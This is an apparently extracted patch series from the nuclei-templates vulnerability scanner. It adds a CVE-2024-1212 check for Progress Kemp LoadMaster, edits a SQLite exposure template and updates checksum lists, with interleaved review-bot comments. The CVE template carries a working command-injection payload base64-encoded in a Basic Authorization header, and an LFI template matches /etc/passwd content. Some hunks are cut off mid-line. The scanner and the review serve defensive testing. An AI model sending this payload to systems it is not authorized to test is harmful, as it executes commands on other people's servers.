@@ -44,4 +44,4 @@ http: - type: dsl dsl: - "status_code_1!=404 && status_code_2 == 404 || status_code_3 != 404 && status_code_4 == 404" -# digest: 4b0a004830460221009bb41d08061c1ba58f9ba9d6da08c33ade50b3877f2e7aec5ecd20bb45a8b2f6022100e43b897605b6c1cb2720b460ebe592eceecec9662a9b51717e07568020ebcee2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207f1f208de9031454a3413b7b13977ee8f563be5c0ad83771de6897fa56a46c7f022100ab113072a9c2f91610fedd3a50cae51b16e01fca22b04c80bfdd675f86c0e45b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/fuzzing/linux-lfi-fuzzing.yaml b/http/fuzzing/linux-lfi-fuzzing.yaml index d21b76eb01..83913e46ba 100644 --- a/http/fuzzing/linux-lfi-fuzzing.yaml +++ b/http/fuzzing/linux-lfi-fuzzing.yaml @@ -45,4 +45,4 @@ http: regex: - "root:.*:0:0:" part: body -# digest: 4a0a004730450220530a89eabafecafbf0a3de2f0ba62e33e25cefd85b20289a912eb5a15603ad51022100c63b246226590dd18a0c6e10508d8c5aed77d6ba23037197d980799866a876c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210087a307489eb418f0906031bfc714587a7a63d61d3d748d51d61d33634454363502205b0a0800d1c4a85649d92cc90161e84a8539243c735643c99f74bc57483a3d77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/fuzzing/mdb-database-file.yaml b/http/fuzzing/mdb-database-file.yaml index 3239da2aee..9b67344fe9 100644 --- a/http/fuzzing/mdb-database-file.yaml +++ b/http/fuzzing/mdb-database-file.yaml 
@@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207843690e40ef53160e535662659535e27e49d4c23da29954cf7bae6db715b98c022100b90846e49879ba649cdd9e5bf68edd48a79c2d56641eaaa31d184f794a2e5d7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a9c05c6a0c6579c0639a578b69157823126b4bc4badc33f4dcb52408d2fbd2960220798dd8340f94afec52275e40be3cdcf758b8a052afb2e0233aa34653cb33f22d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/fuzzing/prestashop-module-fuzz.yaml b/http/fuzzing/prestashop-module-fuzz.yaml index 812dc64365..f03a8ca4b3 100644 --- a/http/fuzzing/prestashop-module-fuzz.yaml +++ b/http/fuzzing/prestashop-module-fuzz.yaml @@ -43,4 +43,4 @@ http: group: 2 regex: - '( Date: Wed, 20 Mar 2024 01:19:14 +0530 Subject: [PATCH 17/86] Create CVE-2024-1212.yaml --- http/cves/2024/CVE-2024-1212.yaml | 47 +++++++++++++++++++++++++++++++ 1 file changed, 47 insertions(+) create mode 100644 http/cves/2024/CVE-2024-1212.yaml diff --git a/http/cves/2024/CVE-2024-1212.yaml b/http/cves/2024/CVE-2024-1212.yaml new file mode 100644 index 0000000000..6068d1e1b0 --- /dev/null +++ b/http/cves/2024/CVE-2024-1212.yaml 
@@ -0,0 +1,47 @@
+id: CVE-2024-1212
+
+info:
+ name: Progress Kemp LoadMaster - Unauthenticated Command Injection
+ author: DhiyaneshDK
+ severity: critical
+ description: |
+ Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.
+ reference:
+ - https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster
+ - https://freeloadbalancer.com/
+ - https://kemptechnologies.com/
+ - https://support.kemptechnologies.com/hc/en-us/articles/23878931058445-LoadMaster-Security-Vulnerability-CVE-2024-1212
+ - https://support.kemptechnologies.com/hc/en-us/articles/24325072850573-Release-Notice-LMOS-7-2-59-2-7-2-54-8-7-2-48-10-CVE-2024-1212
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10
+ cve-id: CVE-2024-1212
+ cwe-id: CWE-78
+ epss-score: 0.00046
+ epss-percentile: 0.13478
+ metadata:
+ verified: true
+ max-request: 1
+ shodan-query: html:"LoadMaster"
+ tags: cve,cve2024,progress,rce,loadmaster
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/access/set?param=enableapi&value=1"
+ headers:
+ Authorization: "Basic JztsczsnOmRvZXNub3RtYXR0ZXI="
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "bin"
+ - "mnt"
+ - "WWW-Authenticate: Basic"
+ condition: and
+
+ - type: status
+ status:
+ - 200
From 717075e5b3a292a95612bb62de7ff3060e61b1ba Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 20 Mar 2024 09:33:12 +0530 Subject: [PATCH 18/86] Update generic-db.yaml --- http/exposures/files/generic-db.yaml | 24 ++++++++---------------- 1 file changed, 8 insertions(+), 16 deletions(-)
diff --git a/http/exposures/files/generic-db.yaml b/http/exposures/files/generic-db.yaml
index 811540a3c6..0ac1962fbf 100644
--- a/http/exposures/files/generic-db.yaml
+++ b/http/exposures/files/generic-db.yaml
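Review bot: The single request at the `path` entry, `GET /access/set?param=enableapi&value=1`, changes configuration on the target (it enables the API) rather than only observing it, yet the `tags` line gives operators no way to exclude state-changing checks; `tags: cve,cve2024,progress,rce,loadmaster,intrusive` would use the tag nuclei-templates applies to such templates. The `info` block also lacks a `remediation` field even though the release-notice reference already names the fixed builds in its URL slug (LMOS 7.2.59.2, 7.2.54.8 and 7.2.48.10, if I read the slug correctly); a line such as `remediation: Update to LMOS 7.2.59.2, 7.2.54.8 or 7.2.48.10 or a later release, per the vendor release notice.` would make a hit actionable for whoever reads the scan output. The same `info` block is edited again by a later hunk in this series, so whichever lands last should carry both additions.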
@@ -1,7 +1,7 @@ id: generic-db info: - name: Generic DB file exposure + name: Generic Database File - Exposure author: Michal Mikolas (nanuqcz) severity: high description: This is collection of some web frameworks recommendation or default configuration for SQLite database file location. If this file is publicly accessible due to server misconfiguration, it could result in application data leak including users sensitive data, password hashes etc. @@ -41,8 +41,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 metadata: - verified: true - tags: database,exposure,sqlite,sqlite3 + max-request: 89 + tags: files,database,exposure,sqlite,sqlite3 http: - method: GET @@ -140,19 +140,11 @@ http: - "{{BaseURL}}/database/production.db" - "{{BaseURL}}/database/production.sqlite3" - matchers-condition: and matchers: - - type: status - status: - - 200 - - # SQLite file always starts with "SQLite format {sqlite_version}" - type: dsl dsl: - - 'startswith(body, "SQLite format ")' - - # SQLite file usually contains "CREATE TABLE", meaning there is at least one table - - type: word - part: body - words: - - "CREATE TABLE " + - 'startswith(body, "SQLite")' # SQLite file always starts with "SQLite format {sqlite_version}" + - 'contains(body, "CREATE TABLE")' # SQLite file usually contains "CREATE TABLE", meaning there is at least one table + - '!contains(body, " Date: Wed, 20 Mar 2024 09:36:02 +0530 Subject: [PATCH 19/86] Update CVE-2024-1212.yaml --- http/cves/2024/CVE-2024-1212.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/http/cves/2024/CVE-2024-1212.yaml b/http/cves/2024/CVE-2024-1212.yaml index 6068d1e1b0..f2464b4726 100644 --- a/http/cves/2024/CVE-2024-1212.yaml +++ b/http/cves/2024/CVE-2024-1212.yaml 
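Review bot: The new dsl line `'startswith(body, "SQLite")'` loosens the check it replaces: an SQLite database file begins with the literal header `SQLite format 3`, so `"SQLite format "` matched only real database files, whereas the shorter prefix also accepts any text response that happens to open with the word SQLite (an error message, for instance), and the `status: 200` matcher that used to filter such responses is removed in the same hunk. Keeping `- 'startswith(body, "SQLite format ")'` retains the precision the deleted comment describes at no cost. Several expressions now sit under one `dsl:` list; unless the added lines after the point where this hunk is garbled in the extracted patch set `condition: and`, nuclei evaluates the list with its default `or`, so the `CREATE TABLE` check and the negated HTML check become alternatives rather than the cumulative requirements that the removed `matchers-condition: and` previously enforced. The enclosing `http` request block starts outside the hunk.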
@@ -1,17 +1,16 @@ id: CVE-2024-1212 info: - name: Progress Kemp LoadMaster - Unauthenticated Command Injection + name: Progress Kemp LoadMaster - Command Injection author: DhiyaneshDK severity: critical description: | Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution. reference: - https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster - - https://freeloadbalancer.com/ - - https://kemptechnologies.com/ - https://support.kemptechnologies.com/hc/en-us/articles/23878931058445-LoadMaster-Security-Vulnerability-CVE-2024-1212 - https://support.kemptechnologies.com/hc/en-us/articles/24325072850573-Release-Notice-LMOS-7-2-59-2-7-2-54-8-7-2-48-10-CVE-2024-1212 + - https://nvd.nist.gov/vuln/detail/CVE-2024-1212 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 From 82925b02f81dfdf6832cd051937d49cae1aec923 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 20 Mar 2024 04:11:42 +0000 Subject: [PATCH 20/86] Auto Generated New Template Addition List [Wed Mar 20 04:11:42 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 4627f5e9d0..932ae622c6 100644 --- a/.new-additions +++ b/.new-additions @@ -27,6 +27,7 @@ file/keys/wireguard/wireguard-private.yaml http/cves/2023/CVE-2023-49785.yaml http/cves/2023/CVE-2023-5830.yaml http/cves/2023/CVE-2023-5914.yaml +http/cves/2024/CVE-2024-1212.yaml http/cves/2024/CVE-2024-1698.yaml http/exposed-panels/bynder-panel.yaml http/exposed-panels/cisco/cisco-expressway-panel.yaml From a35069ee22b0a20ebee646d2be759e8211c7ec44 Mon Sep 17 00:00:00 2001 
From: GitHub Action Date: Wed, 20 Mar 2024 04:11:56 +0000 Subject: [PATCH 21/86] Auto Generated Templates Checksum [Wed Mar 20 04:11:56 UTC 2024] :robot: --- templates-checksum.txt | 75 +++++++++++++++++++++--------------------- 1 file changed, 38 insertions(+), 37 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 7516f9bdb0..649fc4f262 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -10,7 +10,7 @@ TOP-10.md:06a54531fef2bfc5ec2fa38485a3e30c247a3132 cloud/enum/aws-app-enum.yaml:26d0dcf57c7ba8003940ed1d53a62971564b2018 cloud/enum/aws-s3-bucket-enum.yaml:0d101b898bbaebceea4020963d11829f8167029f cloud/enum/azure-db-enum.yaml:3d29a3c86288356d862922ef0527de99187bf734 -cloud/enum/azure-vm-cloud-enum.yaml:69ca5c626f0061e4c9bcc922bf9e05f078459bd2 +cloud/enum/azure-vm-cloud-enum.yaml:6d9043c907009b2ff6afc6cd09bd35a6d27f6fe9 cloud/enum/azure-website-enum.yaml:037397591c799d32eb8abc94a346ff0805d68204 cloud/enum/gcp-app-engine-enum.yaml:b22ff0601a3f7f6ddc39e39ab9dc34410d213e41 cloud/enum/gcp-bucket-enum.yaml:896300c26517adf67feb80304f5edb25590a03c4 @@ -1199,7 +1199,7 @@ http/cves/2017/CVE-2017-16894.yaml:0c7f7d0bdb16cdff6e7a380ba56208eb1ca9d6e6 http/cves/2017/CVE-2017-17043.yaml:b45105c0de0d90d61a79191de73976e9cd4fb790 http/cves/2017/CVE-2017-17059.yaml:d40f8c2b908798457c9b02fa98a480b8bc0a7215 http/cves/2017/CVE-2017-17451.yaml:04b0b3fec8b256c76cef8ea892836c2e420878b8 -http/cves/2017/CVE-2017-17562.yaml:f73fd69cc36d28c4be6a6747c45f942f857029ef +http/cves/2017/CVE-2017-17562.yaml:2e22c184cd57f7425fba3827242a122c39dc86e8 http/cves/2017/CVE-2017-17731.yaml:1666574cd4dfc7a3995867c7c4b621b267b885ff http/cves/2017/CVE-2017-17736.yaml:877434782e6a2c5b3095498877a022c3551b6ca8 http/cves/2017/CVE-2017-18024.yaml:6b154b9615599e11764e703081eca6329935ee5e 
@@ -1496,7 +1496,7 @@ http/cves/2019/CVE-2019-16932.yaml:182fef4932dc7931c45cd3d7aebdaeef9ded81e8 http/cves/2019/CVE-2019-16996.yaml:ad524a9c60b54d610e8c55acaa46e4958a9b8dce http/cves/2019/CVE-2019-16997.yaml:e103b4c103866170ecfaef2fcf0e2cf88609b940 http/cves/2019/CVE-2019-17270.yaml:8f282f5849f13dda11bbb8837079bb223d9687fb -http/cves/2019/CVE-2019-17382.yaml:2a14f06044507c830b2d10f4a86315439d64f88f +http/cves/2019/CVE-2019-17382.yaml:f76bdf75f84fdcae6c031cc28c3420d8dc40f808 http/cves/2019/CVE-2019-17418.yaml:dbeea758a5b8de4c18d2d8790798711113d69195 http/cves/2019/CVE-2019-17444.yaml:7b94376c34d962236141cba63543376257005654 http/cves/2019/CVE-2019-17503.yaml:6701aacab1ee79d24acd3cbd1497fb50399ad671 @@ -2398,7 +2398,7 @@ http/cves/2022/CVE-2022-1933.yaml:97c269db3367ffd56494243b090e307b4eb0b586 http/cves/2022/CVE-2022-1937.yaml:f888a42c920fb30ae5b563bf642af334cd97da95 http/cves/2022/CVE-2022-1946.yaml:982f4f9519b1a137a8d2f2c71c7f2225cb67da1d http/cves/2022/CVE-2022-1952.yaml:4c4d64ceb64295942d0d9c2c1ae79a9bc6a16ee7 -http/cves/2022/CVE-2022-2034.yaml:db07244959fe5aec265a0b9f1e8b398a93a6076c +http/cves/2022/CVE-2022-2034.yaml:6d1a2c994d2ebda1cdcdc84b36237565c66c592a http/cves/2022/CVE-2022-21371.yaml:e9b20049b90afecb519db58387e5922047ef5944 http/cves/2022/CVE-2022-21500.yaml:7a87435ea2a54ac9c454a344a87fd21e51758b36 http/cves/2022/CVE-2022-21587.yaml:9e40fc00a04665d81ac142e197d40f1926a521c6 
@@ -2480,7 +2480,7 @@ http/cves/2022/CVE-2022-25489.yaml:5c5c7a7388f9e133b0cf380bad27eeaebb0c2a74 http/cves/2022/CVE-2022-25497.yaml:07424dc06af0ea2d10c5aa1a201ce4d0f2d26848 http/cves/2022/CVE-2022-2551.yaml:a2dc5d4686710a2e9aeea1bdadf8f7fac2f3766f http/cves/2022/CVE-2022-25568.yaml:aabffcf5827e7ee05211b2651ca350e913371665 -http/cves/2022/CVE-2022-2599.yaml:51779e43ad99b49a367ddd03a76fc22508c0c15c +http/cves/2022/CVE-2022-2599.yaml:f576fefcf8da91a4c868c4b06cad0a2ed36884cb http/cves/2022/CVE-2022-26134.yaml:788a7f51e1550cc5770aab979234ac35b54d2505 http/cves/2022/CVE-2022-26138.yaml:15d0534ab6765d2e536070eda15d020e04f43abc http/cves/2022/CVE-2022-26148.yaml:f37f9182974b9dd8d49af32a7ef9841fe7d704ae @@ -2819,7 +2819,7 @@ http/cves/2023/CVE-2023-24278.yaml:e397c7d647c7517b78e44dbc79c8fcbc80480623 http/cves/2023/CVE-2023-24322.yaml:c4b5cc0d4d70fa16682f706a954b95c84e0e7896 http/cves/2023/CVE-2023-24367.yaml:dab63258fffca6b44d754ede551d56eea925a477 http/cves/2023/CVE-2023-24488.yaml:8a381e70fd0643ed5d1371edb70b40e25e9b5ff8 -http/cves/2023/CVE-2023-24489.yaml:ffcbd0678ae55a267244d0a62703c1756b701aae +http/cves/2023/CVE-2023-24489.yaml:c895cc71b777b3ada793ebcddd00274157f7927d http/cves/2023/CVE-2023-24657.yaml:1efdbfecef2aacf600fb007989d4efc6aa9d7fbe http/cves/2023/CVE-2023-24733.yaml:f1b740ac9ba1fc859deb3c69798e1bc3d302ed4e http/cves/2023/CVE-2023-24735.yaml:e38322978b1598d32056adb11572c6c401107c40 
@@ -3085,6 +3085,7 @@ http/cves/2024/CVE-2024-1071.yaml:672dd1ef0240ede4f06d3b98caf96f2f14bd1e8e http/cves/2024/CVE-2024-1208.yaml:6f0363cecc95a2187f9fbca30620a2d39d87eb15 http/cves/2024/CVE-2024-1209.yaml:36f848394da33f75c2198b8f5b9081f212b3ecd1 http/cves/2024/CVE-2024-1210.yaml:1333fe26c55e1b4e44bcfdc0e0de5226a053f949 +http/cves/2024/CVE-2024-1212.yaml:048e1190f404d00105e446714c22fd44431bd387 http/cves/2024/CVE-2024-1698.yaml:86f5580473ce4a829a4279af9ad763b52bfd4983 http/cves/2024/CVE-2024-1709.yaml:7f5ad668e9c8e5ab56afee96df8907d7ccc71e0b http/cves/2024/CVE-2024-21644.yaml:e8d58594c2dc1021f9107eee925f11791e0627e7 @@ -3206,7 +3207,7 @@ http/default-logins/ofbiz/ofbiz-default-login.yaml:2e6eea7863853fca0a5546a479d43 http/default-logins/openemr/openemr-default-login.yaml:e47d165fc7a306238827e4ea1497307f932890cd http/default-logins/openmediavault/openmediavault-default-login.yaml:efb418987e7a7b80b6fc9ea78f883b4dcaa90efe http/default-logins/oracle/businessintelligence-default-login.yaml:29309871b052bb3f05de613e838dadb92dd47f79 -http/default-logins/oracle/peoplesoft-default-login.yaml:5da182e00f57e6927f30674cde5f7bae9de6bbd4 +http/default-logins/oracle/peoplesoft-default-login.yaml:21071ffc4b0449f88570d4d604038756ccd18209 http/default-logins/others/aruba-instant-default-login.yaml:398f77a4e4e01153465c51bdfeb3cf53f670a85b http/default-logins/others/ciphertrust-default-login.yaml:9d29315f7fd68f1e4f55dd046bf7c716658ef13e http/default-logins/others/cnzxsoft-default-login.yaml:71898b0928c2f380612addb0350fb686dd84e025 
@@ -3292,7 +3293,7 @@ http/exposed-panels/acunetix-panel.yaml:b10cd9d4a29dea26e161ddeb85b6b920efd69870 http/exposed-panels/addonfinance-portal.yaml:38506f2dd6a3a69108a50fe67a2686af99398590 http/exposed-panels/adhoc-transfer-panel.yaml:dcce7565c43f4ea78e2a3ad9fc8216f301f05c94 http/exposed-panels/adiscon-loganalyzer.yaml:fc2432f93a3fd7724c3f0d2814d41c065e0b8b21 -http/exposed-panels/adminer-panel-detect.yaml:89f3dfcb1a75493cc7d806df52ee64b3e65450fa +http/exposed-panels/adminer-panel-detect.yaml:2c1c41366071aef22dcd3f0fb77608e8ba4d18d8 http/exposed-panels/adminer-panel.yaml:b266fbab664e4ee130429e725409cf78000739e0 http/exposed-panels/adminset-panel.yaml:2be3fbb1ec0fe028405fdb0353163d1352a14d65 http/exposed-panels/adobe/adobe-component-login.yaml:ca846d96566ad14a055b85c15bd2b61e3a786d8d @@ -4340,7 +4341,7 @@ http/exposures/apis/wadl-api.yaml:7a728eb7a4cb779218d582661a7fb2978abedc03 http/exposures/apis/wsdl-api.yaml:e28378d37cb724e50ad74e13158210a704a2d9df http/exposures/backups/exposed-mysql-initial.yaml:546b26c48697aa27b99c9d385c509b1af10e8907 http/exposures/backups/froxlor-database-backup.yaml:a8296d723d545dea6b9d898766db58cc8f06c984 -http/exposures/backups/php-backup-files.yaml:505b1da333d78f3266443cab2fa4f9a6e57d6635 +http/exposures/backups/php-backup-files.yaml:2c05d22cc231014da2a5964eee452bf96706b391 http/exposures/backups/settings-php-files.yaml:4deb7ac78c1f7df72c6efad11c7ce77373c3ba7b http/exposures/backups/sql-dump.yaml:e989e8b4ad56b0ed996c7dc9cec7eab2210c223c http/exposures/backups/zip-backup-files.yaml:0b4309555d6a4f0fee56b49d302d209baccb808e 
@@ -4822,19 +4823,19 @@ http/exposures/tokens/zendesk/zendesk-key.yaml:002e66de48b921b1485a90c9ee0b8202d http/exposures/tokens/zenserp/zenscrape-api-key.yaml:a8b850b2efaae638efc02b5d207fe6bc855610e9 http/exposures/tokens/zenserp/zenserp-api-key.yaml:dc1d18779abf2831c2b624b8cebad22f57bad735 http/exposures/tokens/zoho/zoho-webhook-token.yaml:213408cbf1610741f4f31da89e8dba8f3d5b20eb -http/fuzzing/cache-poisoning-fuzz.yaml:55b0174b93ae85bcd2a5bd8dae8d5f2ee6dc183c -http/fuzzing/header-command-injection.yaml:531a6bae6185a29c431f42e8f2d0e4931ec82d05 -http/fuzzing/iis-shortname.yaml:3b02c03dfa0000145db4e569e9894ae9f9bfe4e0 -http/fuzzing/linux-lfi-fuzzing.yaml:98fb1f938fadd7dbef664b4fb90f70340998090d -http/fuzzing/mdb-database-file.yaml:f10257c4e4200709619934b82ad68db7c8ddf918 -http/fuzzing/prestashop-module-fuzz.yaml:7dad3e5599c90ca0dd227bebde42d56d3dc4fe8d -http/fuzzing/ssrf-via-proxy.yaml:61406c0b18b887b8b0820c01ccb006f25a8febf2 -http/fuzzing/valid-gmail-check.yaml:a9ddd0375c3160a61a5f2387c1113b9b64df8879 -http/fuzzing/waf-fuzz.yaml:d748d662ef552cee252b45d68017a09286c6eb93 -http/fuzzing/wordpress-plugins-detect.yaml:6a6a62082132ee13694282e8b77818db20ae5e64 -http/fuzzing/wordpress-themes-detect.yaml:bac6070c72b0db61adc5945ec1b14326c766cd14 -http/fuzzing/wordpress-weak-credentials.yaml:31dff20ca524cae856476baac860a09fd9a536ed -http/fuzzing/xff-403-bypass.yaml:debf58b69daf4676a60aba8af99fd6dc99df1d7d +http/fuzzing/cache-poisoning-fuzz.yaml:f98fed523a1e8b80a6c5c12183c6f072bb81cf5e +http/fuzzing/header-command-injection.yaml:bf0af66d12ef68c553a7a0d496f469788f3d03c3 +http/fuzzing/iis-shortname.yaml:aafbc44fc50e604004bf52f14b83354e24163827 +http/fuzzing/linux-lfi-fuzzing.yaml:a92bbc9f1c966c3f909279c49e2dee0a2bfffac9 +http/fuzzing/mdb-database-file.yaml:f6bb4e9e482516e6a861cc1efc68063e61778d13 +http/fuzzing/prestashop-module-fuzz.yaml:8e7f0e0bd609549e38f8eadc603360e8a56f2a02 +http/fuzzing/ssrf-via-proxy.yaml:8b57f45fe9d33268b5ae1dcd1a73301a47dfee62 
+http/fuzzing/valid-gmail-check.yaml:a91c4df030cbeb5d163df9a3150cb146eb495412 +http/fuzzing/waf-fuzz.yaml:0bf3b44516d1eab46bbc11fb2eada0293c76a2ad +http/fuzzing/wordpress-plugins-detect.yaml:4bd980e6a9b9246896b0961dbff25a199038bcf0 +http/fuzzing/wordpress-themes-detect.yaml:86b90c67fd9c7fb48a6eff67fdb63a185f402ea8 +http/fuzzing/wordpress-weak-credentials.yaml:13dbc34b62167f75f802b83a3e71d89387ba54a6 +http/fuzzing/xff-403-bypass.yaml:23f78013ddcc53b07fbc3a114f0eaa45f90001d5 http/honeypot/citrix-honeypot-detect.yaml:a632cb08a12e2d3dfe69f8b4e8d0cbd4d44cbbc5 http/honeypot/dionaea-http-honeypot-detect.yaml:7830d2af83e16b50c0a4b647defe89c9ac5efe25 http/honeypot/elasticpot-honeypot-detect.yaml:73cb47452335d2c4e95f07bdbaabcb7800b634aa @@ -4895,7 +4896,7 @@ http/miscellaneous/balada-injector-malware.yaml:46e26d3735f737c251df9a46d7091f3d http/miscellaneous/clientaccesspolicy.yaml:f1ce4622fb979da2754ffba7bf52cdfe3fc470d0 http/miscellaneous/crypto-mining-malware.yaml:10c82a94c2cf226eb22b8ac8e10dc88d8aa24387 http/miscellaneous/defaced-website-detect.yaml:045ede38b93611039e21dc0f249ddebf3a5499e5 -http/miscellaneous/defacement-detect.yaml:4bb02fec3ec11dcb407a956be1fc2f0a6bcc9897 +http/miscellaneous/defacement-detect.yaml:0636060c6c434c29a127d7cac1a29f86167d420e http/miscellaneous/detect-dns-over-https.yaml:46b316a9632c17d9cf75cbb27de9c706c9a14b0b http/miscellaneous/dir-listing.yaml:dad3bf5aa871745ab62bf6f4b61909bde637e326 http/miscellaneous/email-extractor.yaml:5815f093718b70c0b64c4c423cd1ec8ab94f1281 
@@ -4912,7 +4913,7 @@ http/miscellaneous/maxforwards-headers-detect.yaml:9d69555c1fc58f644b5ccf2644e0a http/miscellaneous/microsoft-azure-error.yaml:bfa3c53d4023d524a09ba3565bd3bf63204ac58a http/miscellaneous/moodle-changelog.yaml:9dbf59caabecc08967456fa3986046e33f4dbf43 http/miscellaneous/netflix-conductor-version.yaml:31ad2c649ff4aa0703a5c7cd4e36d2245a8993e0 -http/miscellaneous/ntlm-directories.yaml:8d2b0ffc05206f993712a9bbd94071107bcda074 +http/miscellaneous/ntlm-directories.yaml:8d52b0df9375267f6ba7840037a48a96cb971dda http/miscellaneous/old-copyright.yaml:de816764aefeaf59f75201740f4f82fb31071194 http/miscellaneous/options-method.yaml:2e0edc5993baa53c6fb7e8307c80ea26254bc3e4 http/miscellaneous/rdap-whois.yaml:c25cfe8b61f82c032de77398cf1aed94f56f0004 @@ -4958,7 +4959,7 @@ http/misconfiguration/aem/aem-secrets.yaml:346f23f7070fdf59c2c76fddd12a5eb4f31c7 http/misconfiguration/aem/aem-security-users.yaml:ff974be49aaee03897db4a6d40117b9e5d02598d http/misconfiguration/aem/aem-setpreferences-xss.yaml:dd08fc188a7ad278c8ee3082b66d9d2282d1c9e8 http/misconfiguration/aem/aem-sling-userinfo.yaml:f38274749b0668275a6b8cdddc2707bbde9eb1a0 -http/misconfiguration/aem/aem-userinfo-servlet.yaml:47c5ab71db4a7fde4c72b30d1c273f2dc2e637b9 +http/misconfiguration/aem/aem-userinfo-servlet.yaml:4e42c3fd5d4ae21b1e0a686a35c69394d1d9d32b http/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml:cc07ee10590df2dd7de1d03c73167bbd4d81b95b http/misconfiguration/aem/aem-xss-childlist-selector.yaml:a9ecdb229a17db9192821a583549813a1bb1fc3c http/misconfiguration/airflow/airflow-debug.yaml:c18746cecd6f440d9367f6ebe1ce70ff34e508af 
@@ -5073,7 +5074,7 @@ http/misconfiguration/gitlab/gitlab-public-repos.yaml:1a2b426983d0ca449461a9ece3 http/misconfiguration/gitlab/gitlab-public-signup.yaml:f604c8044baffdf63ed2215ccec5b5721202144b http/misconfiguration/gitlab/gitlab-public-snippets.yaml:64aa47f34d185b8bbbc04b242eb0a76886d641ec http/misconfiguration/gitlab/gitlab-uninitialized-password.yaml:d9959b940359896de41142fe765303a3627c7ae5 -http/misconfiguration/gitlab/gitlab-user-enum.yaml:899a8a3e6898f4898986bb1bda5e248b360bd427 +http/misconfiguration/gitlab/gitlab-user-enum.yaml:09ffd851b3108524029e04ca4f1a501e1c580757 http/misconfiguration/gitlist-disclosure.yaml:8111ac3c10bc09b42d9c2bc565cd5758cb6a220e http/misconfiguration/global-traffic-statistics.yaml:f5ab7750ae4d32d8b857b8290bcd98ac1358fa0d http/misconfiguration/glpi-directory-listing.yaml:29bb88890e78f83428d00799224679dfd993e1bc 
@@ -5320,9 +5321,9 @@ http/misconfiguration/proxy/metadata-hetzner.yaml:99b85a4199e83eff23ec416b6b6fff http/misconfiguration/proxy/metadata-openstack.yaml:6e1984d2e3aa87e07e6b7db80dbd7c9d10c9d417 http/misconfiguration/proxy/metadata-oracle.yaml:93d94888c382735e755c96a1908859778f1308ef http/misconfiguration/proxy/open-proxy-external.yaml:e05b7e6f0744ee250192e9167a89b4d6c7dfdee1 -http/misconfiguration/proxy/open-proxy-internal.yaml:5de892d38ee34977924d4eb2cbd644b4b51fe567 -http/misconfiguration/proxy/open-proxy-localhost.yaml:4cd4b2b6c999578dff79a1d9d0aab65b759db464 -http/misconfiguration/proxy/open-proxy-portscan.yaml:e4806af440f78fced0b1239e83f9a5b440c4b4ee +http/misconfiguration/proxy/open-proxy-internal.yaml:231fecdb37f031eb304aba2267a8ba6ad16641ec +http/misconfiguration/proxy/open-proxy-localhost.yaml:583e013ed1b8deaaa42735861dc5201a8285afc6 +http/misconfiguration/proxy/open-proxy-portscan.yaml:790b7ea770648cb312cb5c103951c3c7254cb0c2 http/misconfiguration/puppetdb-dashboard.yaml:5b1f354f5ab9343e46a20bd7c76a8ee044cf71b4 http/misconfiguration/put-method-enabled.yaml:4cbb1715aeb73cf6e638b02c9951ff02c7a67756 http/misconfiguration/python-metrics.yaml:0b1d1102e4329ebf75ae5cc259898f1cb1cd9670 @@ -6447,7 +6448,7 @@ http/technologies/google-frontend-httpserver.yaml:de094bfafe3b5aea16e1bffb3ab80c http/technologies/graphiql-detect.yaml:a50e33498f73c5c27694fdad64d7d5f06dc1fe29 http/technologies/graphql-detect.yaml:a0566e15058b3aeb2d4dae77cc99d23355938dac http/technologies/grav-cms-detect.yaml:f353a0fa76204ccd1c894aa850f977fef8c769f1 -http/technologies/graylog/graylog-api-exposure.yaml:c669347801d0d2a1ec1f100228f4f48e99f28dd9 +http/technologies/graylog/graylog-api-exposure.yaml:d101cae7fd923dd7f233bf27e3a9b3628b8c3d5e http/technologies/graylog-api-browser.yaml:5aaa8bff99b57cf700d0923b48778048789f2389 http/technologies/gunicorn-detect.yaml:4e32fda7d9483af8c21fd3ea7fa6669266e23d0d http/technologies/hanwang-detect.yaml:4866144f96b1fbc18567e10ad7732b8a1a8dfc5f 
